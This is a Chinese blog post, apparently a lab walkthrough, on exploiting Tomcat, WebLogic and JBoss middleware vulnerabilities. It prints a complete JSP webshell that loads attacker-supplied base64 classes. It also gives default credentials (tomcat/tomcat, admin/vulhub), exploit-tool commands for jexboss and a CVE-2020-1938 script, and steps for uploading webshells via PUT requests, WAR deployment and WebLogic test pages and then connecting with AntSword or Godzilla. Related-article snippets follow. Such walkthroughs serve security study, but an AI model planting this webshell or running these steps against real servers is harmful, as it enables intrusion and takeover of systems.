常见中间件漏洞

已于 2024-08-08 14:03:25 修改
阅读量1.3k 收藏 11
点赞数 49
文章标签: firefox 安全 web安全 服务器 运维 开发语言 java
于 2024-08-06 10:38:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53198216/article/details/140948740
版权

一、Tomcat

1.CVE-2017-12615

 1.1打开tomcat页面

1.2 打开burp进行抓包,修改PUT方式,后面加上一句话木马

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

1.3上传木马后进入这个jsp页面,burp放行

1.4打开中国蚁剑测试连接

2.后台弱口令部署war包

2.1打开tomcat页面点击左边的manager app,输入弱口令tomcat/tomcat

2.2进入manager页面

2.3打开哥斯拉生成一个jsp木马,我们压缩成zip文件再修改后缀为war

2.4我们选择这个war文件点击deploy

2.5我们再打开这个jsp文件

2.6最后打开哥斯拉进行连接测试

3.CVE-2020-1938

3.1 先搭建好环境

3.2打开kali下载cve2020-1938

3.3右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip

二、Weblogic

1.后台弱口令getshell

1.1进入环境在地址栏后输入/console进入登录页面

1.2输入弱口令登录

1.3进入页面后点击部署点击安装

1.4点击上载文件

1.5上传一个jsp木马,先压缩为zip再修改格式为war

1.6进入后访问你植入的木马,没有报错证明注入成功

1.7打开哥斯拉测试连接

2.CVE-2017-3506

2.1打开工具进行漏洞检测

2.2点击命令执行查看whoami

2.3点击文件上传,把jsp木马复制进去点击上传

2.4查看下方出现木马上传成功,打开他给出的地址

2.5没有回显证明木马上传成功

2.6打开哥斯拉测试连接成功

3 CVE-2019-2725

3.1漏洞验证如果出现以下页面代表存在漏洞

3.2打开burp对当前页面进行抓包

3.3上传到重放器发送显示202代表成功

3.4进入写入木马的jsp文件

3.5打开哥斯拉测试连接

4. CVE-2018-2628

4.1进入环境

4.2使用工具对网站进行检测

4.3上传一个jsp木马

4.4打开这个木马文件

4.5打开哥斯拉测试连接

5.CVE-2018-2894

5.1搭建环境在地址栏后输入console

5.2输入账号密码进入后台系统

5.3点击base_domain下的高级启用web服务测试页

5.4保存后进入ws_utc/config.do

5.5修改当前工作目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

5.6点击安全设置名字密码,上传一个木马文件

5.7审查元素找到对应时间戳

5.8

http://ip地址/ws_utc/css/config/keystore/时间戳_⽂件名.jsp

5.9

三、Jboss

1.CVE-2015-7501

1.1

1.2在地址栏后添加/invoker/JXInvokerServlet下载文件

1.3下载ysoserial ⼯具进⾏漏洞利⽤

Release v0.0.6 · frohoff/ysoserial · GitHub

1.4

2.CVE-2017-7504

2.1访问漏洞地址

2.2

使用工具运行python3 jexboss.py -u http://IP地址/

进入shell

3 CVE-2017-12149

3.1访问漏洞⻚⾯

3.2验证是否存在漏洞,该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞

3.3打开jboss反序列化软件 将网址放入 cmd内输入想执行的代码

4.Administration Console弱⼝令

4.1搭建环境

4.2

在地址栏后输入admin-console/login.seam?conversationId=4进入后台登录页面

4.3 弱口令admin/vulhub登录

4.4点击web应用

4.5上传一个jsp木马

4.6进入木马页面

4.7测试连接成功

5.低版本JMX Console未授权

5.1搭建环境

5.2输入admin/vulhub进入页面

5.3点击左侧jboss.deployment

5.4找到⻚⾯中的addURL() 选项远程加载war包来部署

5.5上传一个war包,点击invoke

5.6没有回显证明木马注入成功

5.7测试连接发现连接成功

狂小霖
关注
  • 49
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【合集】常见中间件漏洞
hackzkaq的博客
12-03 2995
1. IIS 1. PUT漏洞 用户配置不当,exp:https://github.com/hackping/HTTPMLScan.git 2. 短文件名猜解 IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 exp:https://github.com/WebBreacher/tilde_enum 3.远程代码执行(CVE-2017-7269)) **exp**:https://github.com/zcgonv
中间件常见漏洞
CSDNndscs的博客
07-17 473
中间件常见漏洞 一、IIS篇 iis6.0 存在 1.asp;.jpg 按asp处理的 ; 截断漏洞 iis6.0 存在 *.asp目录下的所有文件都会按照asp处理的 目录解析漏洞 iis6.0 存在 .asp .cer .cdx 结尾的文件都会按照asp文件进行解析 iis7.0 存在 在Fast-CGI运行模式下,任意文件,例:test.jpg后面加上/.php,会将test.jpg解析为php文件 iis Server 在Web服务扩展中开启了web DAV之后,支持多种请求,配合写入权限,可造
常见中间件漏洞
weixin_52501704的博客
12-09 5491
常见中间件漏洞
常见中间件漏洞的总结
qq_40898302的博客
06-07 9158
常见中间件漏洞总结
中间件漏洞类型?原理以及影响版本,如何利用?
2301_76786857的博客
01-29 898
中间件是一种处于应用程序和操作系统之间的软件,用于实现跨平台、跨语言、跨网络的通信和集成。中间件漏洞是指在中间件中存在的安全漏洞,可能导致攻击者获取权限、窃取数据、控制系统等危害。
常见中间件漏洞(上)
qq_44768719的博客
11-14 1784
iis: 1.put漏洞 原因:在web服务扩展中开启了webDAV,配置了可以任意写入的权限 。 判断方法:将get请求改为options,根据返回的报文判断是否允许put方法 利用:可以用工具使用,自行百度 2.短文件名猜解: 原因:访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 利用形式:需要用到通配符,*可以匹配n个字符,也可以为0个。 举例:1. http://www.target.com/*~1****/a.aspx 2. http://www.t
常见中间件漏洞总结PPT
01-25
常见WebLogic漏洞包括弱口令、SSRF(服务器端请求伪造)、任意文件上传和反序列化漏洞。利用这些漏洞,攻击者可以上传恶意war包,执行任意代码等。这些漏洞在Oracle WebLogic Server的多个版本中存在,如**.*.*.*....
Web中间件常见漏洞总结.pdf
06-14
中间件安全问题常常成为黑客攻击的目标,因此深入理解和掌握Web中间件常见漏洞的知识对于网络安全防护至关重要。下面,我们将围绕文档提及的IIS中间件,总结其常见漏洞类型及修复建议。 1. IIS解析漏洞 IIS解析...
常见中间件漏洞复现
君莫hacker的博客
11-08 8898
常见中间件漏洞复现 中间件Tomcat Apache IIS Jboss Weblogic Nginx 目录tomcat中间件1.tomcat文件上传(CVE-2017-12615) tomcat中间件 1.tomcat文件上传(CVE-2017-12615) 环境:线上环境 vulfocus 影响版本:Tomcat 7.0.0 - 7.0.81
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
中间件漏洞汇总
热门推荐
LainWith的博客
11-26 1万+
目录一些地址什么是中间件iis6x篇PUT漏洞漏洞描述漏洞复现防御方式解析漏洞-基于文件名原理复现防御解析漏洞-基于文件夹原理复现防御IIS短文件漏洞介绍原理复现防御RCE-CVE-2017-7269介绍影响范围复现防御iis7x篇文件解析漏洞原理复现防御HTTP.SYS远程代码执行(MS15-034)介绍影响范围影响版本复现修复建议apache篇未知扩展名解析漏洞漏洞原理复现修复建议AddHandler导致的解析漏洞原理复现修复建议目录遍历漏洞原理复现防御Apache HTTPD 换行解析漏洞(CVE-2
Web中间件常见漏洞总结
qq_35358965的博客
05-09 2908
是一类提供系统软件和应用软件之间的连接,便于软件各部件之间的沟通的软件,应用软件可以借助中间件在不同的技术架构之间共享信息和资源。中间件位于客户机服务器的操作系统之上,管理着计算资源和网络通信。中间件=平台+通信。
常见的中间键漏洞
weixin_48900801的博客
04-04 233
常见的中间键漏洞
常见中间件漏洞总结
爱上卿的博客
01-25 1万+
1. Weblogic常见漏洞 2. Tomcat常见漏洞 3. Nginx常见漏洞 4. JBOSS常见漏洞 中间件简介 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种 软件在不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统 之上,管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统 的软件。相连接的系统,即使它们具有不同的接口,但通过中间件相互之 间仍能交...
一些常见中间件漏洞
ineedmoreMuQ的博客
08-06 287
靶场搭建使用vulhub-master/tomcat/CVE-2017-12615第一步、访问网站第二步、首页抓包改为put方式提交网上找一个jsp的一句话木马使用webshell工具链接即可。
Web中间件常见安全漏洞总结_web中间件常见漏洞总结
2301_82244182的博客
05-17 818
PHP根据URL映射,在服务器上寻找xxx.php文件,但是xxx.php不存在,又由于cgi.fix_pathinfo默认是开启的,因此PHP会继续检查路径中存在的文件,并将多余的部分当作 PATH_INFO。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。另外,IIS6.x除了会将扩展名为.asp的文件解析为asp之外,还默认会将扩展名为.asa,.cdx,.cer解析为asp,从网站属性->主目录->配置 可以看出,他们都是调用了asp.dll进行的解析。
中间件漏洞原理与复现大全【万字总结】
最新发布
2301_80064376的博客
08-18 2637
中间件是位于应用程序与操作系统之间的软件,它提供了不同组件之间的通信、数据管理、应用服务等功能。中间件漏洞是指在中间件的设计、实现或配置中存在的安全问题,这些问题可能让攻击者有机会突破安全防护,获取不当的权限,或者进行其他不安全操作。
IIS中间件漏洞分析及修复策略
"这篇文档是关于Web中间件常见漏洞的总结,主要针对微软的IIS (Internet Information Services)。文档详细介绍了IIS6.x和IIS7.x版本中的解析漏洞、上传安全问题以及修复建议。" 在Web开发中,中间件扮演着至关重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值